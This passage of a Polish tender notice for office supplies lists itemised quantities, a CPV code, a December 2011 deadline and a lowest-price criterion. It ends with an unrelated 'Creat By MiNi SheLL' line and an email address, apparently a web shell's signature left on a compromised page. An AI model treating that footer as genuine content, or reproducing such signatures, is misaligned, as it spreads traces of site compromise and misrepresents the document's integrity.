73.        Teczka zawieszkowa biała  kartonowa         50 op. 
74.        Tusz do stempli gumowych z końcówką ułatwiającą nasączanie    40 szt.   
75.        Wałeczki barwiące do maszyn liczących     10 szt.   
76.        Zakładki indeksujące w bloczkach        50 op.
77.        Zakreślacz ze ściętą końcówką z systemem kapilarnym     180 szt.  
78.        Zeszyt A5 32 kartkowy w kratkę    45 szt.  
79.        Zeszyt A5 twarda oprawa     10 szt.  
80.        Zeszyt A4 twarda oprawa     30 szt.  
81.        Zeszyt A4 - brulion, miękka oprawa 96 kartek    40 szt.   
82.        Zszywacz  o metalowej konstrukcji z uchwytem     30 szt.  
83.        Zszywacz nożycowy    20 szt.   
84.        Zszywacz blokowy-ręczny    3 szt.    
85.        Zszywki do zszywaczy  23/10          26 op.
86.        Zszywki do zszywacza blokowego  23/15         10 op. 
*szczegółowy opis zamówienia zawarty jest w Rozdziale II SIWZ 


UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I oraz II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAKUP MATERIAłóW BIUROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II 

Przedmiotem zamówienia jest zakup materiałów biurowych współfinansowanych ze środków Pomocy Technicznej PO KL. 

L.p.                    Asortyment*                      Ilość

1.    Bloczek samoprzylepny  38 mm x 51 mm    648 szt.  
2.    Bloczek samoprzylepny 76 mm x 76 mm    528  szt. 
3.    Bloczek samoprzylepny 76 mm x 127 mm    324  szt.  
4.    Blok makulaturowy A5 100 kartek w kratkę    53 szt.  
5.    Blok makulaturowy A4 100 kartek w kratkę    68 szt.  
6.    Cienkopis o grubości linii 0,4 mm     108 szt.  
7.    Cienkopis do CD czarny o gr. linii 0,4 mm    16 szt.  
   8.    Długopis automatyczny     138 szt.  
    9.    Wkład do długopisu opisanego w poz. 8    138 szt.   
10.    Długopis żelowy z wymiennym wkładem     223  szt. 
11.    Wkład do długopisu żelowego z poz. 10    171 szt.  
  12.    Długopis samoprzylepny na sprężynce              3 szt.  
   13.    Długopis jednorazowy typu BIC            173 szt.  
   14.    Dziurkacz z ogranicznikiem formatu z    6 szt.  
15.    Etykiety samoprzylepne  adresowe 105x74 mm    6 op. 
16.    Etykiety grzbietowe o szer. 500 mm i 250 mm        10 op
16.I    Grzbiety do bindowania 6 mm         1 op. 
17.    Grzbiety do bindowania 8 mm         1 op. 
18.    Grzbiety do bindowania 12 mm         2 op. 
19.    Grzbiety do bindowania 16  mm         2 op. 
20.    Grzbiety do bindowania 25  mm         1 op.
21.    Grzbiety do bindowania  50 mm     150  szt.  
22.    Gumka kombinowana niebiesko-biała     63 szt.   
23.    Kalkulator z dużym 12-poz. wyświetlaczem    13 szt.   
24.    Klej w sztyfcie o wadze nie mniejszej niż 22 g     33   szt. 
25.    Klej w tubce o wadze nie mniejszej niż 50 ml    20  szt. 
26.    Klip do papieru  19 mm    180    szt. 
   27.    Klip do papieru  32 mm    168  szt.  
   28.    Klip do papieru  51 mm    60 szt.   
   29.    Klips archiwizacyjny         4 op.
   30.    Koperta C6 biała samoprzylepna         5 op. 
   31.    Koperta C5 biała samoprzylepna         22 op.
   32.    Koperta C4 biała samoprzylepna         32 op.
   33.    Koperta biała z rozszerzanymi bokami i spodem    35 szt.   
   34.    Koperta biała z rozszerzanymi bokami i spodem    116 szt.  
   35.    Koperta powietrzna air poc     300 szt.  
   36.    Koperta powietrzna air poc     300 szt.   
   37.    Koperta powietrzna air poc     300   szt. 
   38.    Korektor w płynie ekologiczny     40  szt. 
   39.    Korektor w piórze z metalową  końcówką     35 szt.    
   40.    Korektor w taśmie z kasetą wymienną     50 szt.   
   41.    Wkład do korektora z poz. 40    50 szt.  
   42.    Kostka biurowa -klejona , biała , kolorowa  8,5x8,5 cm   125 szt.  
   43.    Koszulka A5 groszek wykonana folii PP               22 op. 
   44.    Linijka plastikowa 20 cm    16 szt.  
   45.    Linijka plastikowa 30 cm    12  szt. 
   46.    Marker do tablic sucho ścieralnych z okrągłą końcówką    8 szt.   
   47.    Marker zwykły-wszystkie kolory     45 szt.   
   48.    Mazaki kolorowe w kompletach                   27 op.
   49.    Mechanizm  skoroszytowy                 2 op.
   50.    Nożyczki wykonane z nierdzewnej stali  20 cm     9 szt.  
   51.    Okładki do bindowania przeźroczyste przód                 7 op.
   52.    Okładki do bindowania tył karton twardy jednostronnie kolorowy                 7 op.
   53.    Ołówek z gumką HB                 9 op.
   54.    Papier do faksu  210x30 mm                 9 op.
   55.    Papier kserograficzny A4 160 g kolor                32 op.
   56.    Pióro kulkowe czarne i niebieski     42    szt. 
   57.    Przekładki do dokumentów z kolorowego polipropylenu formatu A4,                31 op.
   58.    Pinezki kolorowe                  4 op. 
   59.    Pinezki  kolorowe do tablic korkowych                7 op. 
   60.    Pudło archiwizacyjne o szerokości grzbietu 100 mm    1200 szt.  
   61.    Rozszywacz do dokumentów    2  szt. 
   62.    Segregator A4/75 kolor z mechanizmem dźwigniowym     600  szt.  
   63.    Skoroszyt tekturowy biały zwykły    10 szt.  
   64.    Skoroszyt plastikowy miękki         70 op. 
   65.    Skoroszyt  wielooczkowy  do zawieszania w segregatorze         68 op.
   66.    Spinacze okrągłe 28 mm         20 op. 
   67.    Spinacze plikowe         3 op. 
   68.    Szuflada na dokumenty pozioma - dymna    16  szt. 
   69.    Tablica korkowa w ramie drewnianej      1  szt.  
   70.    Tablica sucho ścieralna naścienna      1  szt.  
   71.    Taśma klejąca 18x10          8 op. 
   72.    Taśma klejąca 24x20          12 op. 
   73.    Taśma pakowa przeźroczysta 48 x 50    6 szt.   
   74.    Teczka do podpisu zawierająca     10  szt.  
   75.    Teczka z gumka  A4 - kolorowa    210 szt.   
   76.    Teczka na rzep A4 z kartonu lakierowanego    8 szt.   
   77.    Teczka zawieszkowa biała  kartonowa         4 op.
   78.    Temperówka podwójna  metalowa    40 szt.    
   79.    Tusz do stempli gumowych z końcówką ułatwiającą nasączanie    15    szt. 
   80.    Zakładki indeksujące w bloczkach        20 op.
   81.    Zakreślacz ze ściętą końcówką z systemem kapilarnym     224   szt. 
   82.    Zeszyt A5 32 kartkowy w kratkę    45  szt. 
   83.    Zeszyt A5 twarda oprawa 96 kartek    33 szt.   
   84.    Zeszyt A4 twarda oprawa 96 kartek    20 szt.   
   85.    Zeszyt A4 - brulion, miękka oprawa 96 kartek    45 szt.   
   86.    Zszywacz  o metalowej konstrukcji z uchwytem     16 szt.   
   87.    Zszywacz nożycowy, obudowa z metalu połączona z plastikiem    17 szt.   
   88.    Zszywacz blokowy-ręczny, zszywający min. 80 kartek     1 szt.   
   89.    Zszywki do zszywaczy  24/6          140 op. 
   90.    Zszywki do zszywaczy  23/10          15 op. 
   91.    Zszywki do zszywacza blokowego  23/15         2 op. 
*szczegółowy opis zamówienia zawarty jest w Rozdziale II SIWZ 
UWAGA
Wszystkie ilości zamawianych materiałów biurowych w części I oraz II są ilościami orientacyjnymi, określonymi w celu oszacowania wartości zamówienia oraz dokonania porównania ofert. Ilości te mogą ulec zmianie (zmniejszeniu), przy czym Wykonawca z tego tytułu nie będzie wnosił roszczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com